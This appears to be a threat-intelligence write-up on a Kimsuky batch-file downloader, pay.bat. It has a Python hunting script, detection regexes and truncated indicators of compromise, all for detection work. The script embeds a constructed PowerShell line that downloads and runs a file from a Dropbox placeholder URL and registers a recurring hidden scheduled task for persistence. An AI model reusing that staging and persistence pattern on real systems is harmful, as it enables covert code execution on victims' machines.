Malware created by APT Kimsuky: pay.bat (2024.11.27)

2024-12-05 Sakai Malware Created by APT Kimsuky - pay.bat (2024.11.27)

https://wezard4u.tistory.com/429348


A Kimsuky-linked batch file named pay.bat launches PowerShell in a hidden window with the execution policy bypassed, then decodes and runs a Base64-encoded command embedded in the file. The decoded script writes chrome.ps1 under the user's AppData directory, downloads further PowerShell content from URLs on dl.dropboxusercontent.com, executes it, and deletes the downloaded scripts afterwards. For persistence it registers a hidden scheduled task named ChromeUpdateTaskMachine that first fires five minutes after creation and repeats every 30 minutes, so the staging loop reruns even after the temporary files are gone. The source lists hashes for the BAT file and several vendor detections, among them BAT/Kimsuky.O and generic downloader classifications. For detection and hunting of Kimsuky script staging, the durable indicators are the behavioural ones (the task name, a hidden PowerShell launch with execution-policy bypass and an encoded command, and downloads from dl.dropboxusercontent.com); the Dropbox paths and the hashes are specific to this sample.
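The staging chain above (hidden PowerShell, execution-policy bypass, Base64-encoded command, a chrome.ps1 drop under AppData, Dropbox download, ChromeUpdateTaskMachine task) can be hunted in process-creation telemetry. The Python script below is an added example written for this page, not code from the original post or from the sample itself: it decodes PowerShell -EncodedCommand payloads (Base64 over UTF-16LE, which is what powershell.exe expects) and matches the behavioural indicators against both the raw command line and the decoded layer. The command lines it runs over are constructed; the Dropbox path (PLACEHOLDER) and the schtasks syntax are assumptions, since the page gives only the domain and the task name.

```python
import base64
import re

# --- Constructed sample telemetry (NOT the real pay.bat) ------------------
# A hypothetical stage-1 script shaped like the behaviour described above:
# drop chrome.ps1 under AppData, fetch from dl.dropboxusercontent.com, run
# it, clean up, and register a 30-minute scheduled task. The URL path and the
# schtasks form are assumptions; the page only gives the domain and task name.
STAGE1_SCRIPT = (
    "$p = Join-Path $env:APPDATA 'chrome.ps1'; "
    "Invoke-WebRequest 'https://dl.dropboxusercontent.com/PLACEHOLDER/stage2.txt' -OutFile $p; "
    "& $p; Remove-Item $p -Force; "
    "schtasks /create /f /tn ChromeUpdateTaskMachine /sc minute /mo 30"
)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINES = [
    # 1: the launch pattern attributed to pay.bat (constructed payload)
    "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
    f"-EncodedCommand {encode_powershell(STAGE1_SCRIPT)}",
    # 2: benign admin activity, should not fire
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # 3: the persistence step on its own, e.g. from a child-process event
    "schtasks.exe /create /f /tn ChromeUpdateTaskMachine /sc minute /mo 30",
]

# --- Decoder ---------------------------------------------------------------
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -en, -enc, ...). Requiring a long Base64 run keeps switches such as
# -ExecutionPolicy Bypass from matching here.
_ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate stripped padding
    try:
        return raw.decode("utf-16-le")                     # what PowerShell itself expects
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")       # hand-rolled encoders


# --- Indicators drawn from the behaviour summary ---------------------------
INDICATORS = {
    "hidden_window":      re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE),
    "policy_bypass":      re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.IGNORECASE),
    "dropbox_staging":    re.compile(r"dl\.dropboxusercontent\.com", re.IGNORECASE),
    "appdata_chrome_ps1": re.compile(r"appdata.*chrome\.ps1", re.IGNORECASE),
    "persistence_task":   re.compile(r"ChromeUpdateTaskMachine", re.IGNORECASE),
    # schtasks form only; a Register-ScheduledTask / -RepetitionInterval
    # variant would need its own pattern.
    "30min_repeat":       re.compile(r"/sc\s+minute\s+/mo\s+30", re.IGNORECASE),
}


def hunt(cmdline: str) -> dict:
    """Decode any encoded command, then match indicators against both layers."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    # A single indicator (e.g. a hidden window) is common in legitimate
    # tooling; require two before calling the event suspicious.
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= 2}


def hunt_all(cmdlines) -> list:
    return [hunt(c) for c in cmdlines]


if __name__ == "__main__":
    for i, r in enumerate(hunt_all(SAMPLE_CMDLINES), 1):
        print(f"[{i}] suspicious={r['suspicious']} hits={r['hits']}")
        if r["decoded"]:
            print("    decoded:", r["decoded"][:120], "...")
```

Running it flags the first and third constructed lines and leaves the benign one alone. In a real hunt the same functions would be fed the CommandLine field of Sysmon Event ID 1 or Windows 4688 records; the two-hit threshold is a starting point, and the task name or the Dropbox domain on their own are strong enough to warrant a look.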

Indicators of Compromise

Values are reproduced as the source listing shows them: the URLs and the first two hashes are truncated, and only the third hash is complete (32 hex digits, MD5-length). Hunt on the dl.dropboxusercontent.com domain and the behaviours above rather than on the partial values.

Type Value First Seen Last Seen
URL https://dl.dropboxusercontent.c… 2024-12-05 2024-12-05
URL http://dl.dropboxusercontent.co… 2024-12-05 2024-12-05
URL http://dl.dropboxusercontent.co… 2024-12-05 2024-12-05
URL https://dl.dropboxusercontent.c… 2024-12-05 2024-12-05
URL https://dl.dropboxusercontent.c… 2024-12-05 2024-12-05
HASH 8e0eb0d36bfd4e28ec6a10acccf8997… 2024-12-01 2024-12-05
HASH fd02470c6cc4ceb5fad3589d02e5148… 2024-12-01 2024-12-05
HASH b262ac518c0114f414aaedbb4ef7c728 2024-12-01 2024-12-05
